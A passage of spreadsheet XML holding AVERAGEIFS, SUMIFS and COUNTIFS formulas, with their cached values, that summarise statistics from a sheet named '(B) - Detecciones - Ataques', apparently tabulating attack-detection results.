        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1421.959349</v>
      </c>
      <c r="BN141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>311.2649333</v>
      </c>
      <c r="BO141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>2</v>
      </c>
      <c r="BT141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA141" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC141" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>6</v>
      </c>
      <c r="CL141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>2.625</v>
      </c>
      <c r="CN141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.75</v>
      </c>
      <c r="CP141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>9</v>
      </c>
      <c r="CQ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>2</v>
      </c>
      <c r="CR141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.3460033017</v>
      </c>
      <c r="CT141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ141" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.090909091</v>
      </c>
      <c r="DK141" s="271"/>
    </row>
    <row r="142">
      <c r="J142" s="277"/>
      <c r="K142" s="512"/>
      <c r="L142" s="512"/>
      <c r="M142" s="512"/>
      <c r="N142" s="512"/>
      <c r="O142" s="278"/>
      <c r="Q142" s="539"/>
      <c r="R142" s="386" t="s">
        <v>2561</v>
      </c>
      <c r="S142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.53814208</v>
      </c>
      <c r="T142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="U142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.898433584</v>
      </c>
      <c r="V142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5833333333</v>
      </c>
      <c r="W142" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2017.142857</v>
      </c>
      <c r="Y142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>1.2</v>
      </c>
      <c r="Z142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>1133.353313</v>
      </c>
      <c r="AA142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>3.546153846</v>
      </c>
      <c r="AB142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>5.572916667</v>
      </c>
      <c r="AC142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.9</v>
      </c>
      <c r="AD142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.7392027689</v>
      </c>
      <c r="AE142" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.1</v>
      </c>
      <c r="AF142" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ES$3:$ES$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.7954545455</v>
      </c>
      <c r="AG142" s="271"/>
      <c r="AH142" s="386" t="s">
        <v>2561</v>
      </c>
      <c r="AI142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.07628415995</v>
      </c>
      <c r="AJ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>3</v>
      </c>
      <c r="AL142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="AN142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AR142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AW142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AY142" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB142" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>4705.333333</v>
      </c>
      <c r="BD142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1904.259349</v>
      </c>
      <c r="BN142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>311.2649333</v>
      </c>
      <c r="BO142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ142" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ES$3:$ES$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.1</v>
      </c>
      <c r="BR142" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS142" s="518">
